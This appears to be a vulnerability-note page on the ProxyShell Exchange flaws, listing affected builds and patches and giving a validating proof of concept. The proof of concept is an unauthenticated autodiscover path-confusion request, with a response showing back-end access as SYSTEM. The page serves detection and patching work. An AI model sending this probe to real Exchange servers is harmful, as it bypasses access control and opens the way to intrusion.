CVE

CVE-2021-34473 / CVE-2021-34523 / CVE-2021-31207 | ProxyShell

CVE-2021-34473: pre-auth path confusion in the front end (Client Access) that bypasses access control and lets an unauthenticated request reach back-end endpoints as SYSTEM. Patched in KB5001779, released April 2021.

CVE-2021-34523: privilege elevation in the Exchange PowerShell back end. Patched in KB5001779, released April 2021.

CVE-2021-31207: post-auth remote code execution via arbitrary file write. Patched in KB5003435, released May 2021.

These vulnerabilities affect the following builds. The numbers are the April 2021 Security Update (KB5001779) builds, so anything lower is vulnerable to the two April CVEs; CVE-2021-31207 additionally needs the May 2021 update (KB5003435):

  • Exchange 2013 CU23 < 15.0.1497.15
  • Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5
  • Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9

Examples

Validating POC

Probe URL. <<domain>> stands for any mailbox-style domain; it has to be identical in the path segment and in the Email parameter, because the front end only strips the fake mailbox segment when the two match (the Email value URL-decodes to the leading path segment):

https://<<ip>>/autodiscover/autodiscover.json?@<<domain>>/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@<<domain>>

Request:

GET /autodiscover/autodiscover.json?@<<domain>>/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@<<domain>> HTTP/1.1
Host: exch.offsec.nl
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Response. A 200 carrying the MAPI/HTTP connectivity page with User NT AUTHORITY\SYSTEM (SID S-1-5-18) means the front end proxied the unauthenticated request to the back end: the server is vulnerable. X-CalculatedBETarget and X-BEServer name the back end that answered; a patched server does not return this page in the SYSTEM context.

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
request-id: af2ae0ee-6593-4523-8fa1-5d283d7ae3da
X-CalculatedBETarget: exch.offsec.nl
X-ServerApplication: Exchange/15.01.1913.012
X-DiagInfo: EXCH
X-BEServer: EXCH
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 25-Aug-1991 07:43:18 GMT; path=/autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: EXCH
Date: Wed, 25 Aug 2021 07:43:17 GMT
Connection: close
Content-Length: 522

<html>
<head>
<title>Exchange MAPI/HTTP Connectivity Endpoint</title>
</head>
<body>
<p>Exchange MAPI/HTTP Connectivity Endpoint<br><br>Version: 15.1.1913.12<br>Vdir Path: /mapi/nspi/<br><br></p><p><b>User:</b> NT AUTHORITY\SYSTEM<br><b>UPN:</b> <br><b>SID:</b> S-1-5-18<br><b>Organization:</b> <br><b>Authentication:</b> Negotiate<br><b>PUID:</b> <br><b>TenantGuid::</b> </p><br><p><b>Cafe:</b> exch.offsec.nl<br><b>Mailbox:</b> exch.offsec.nl</p><p><br><br><br><b>Created:</b> 25-8-2021 07:43:18</p></body></html>

URL list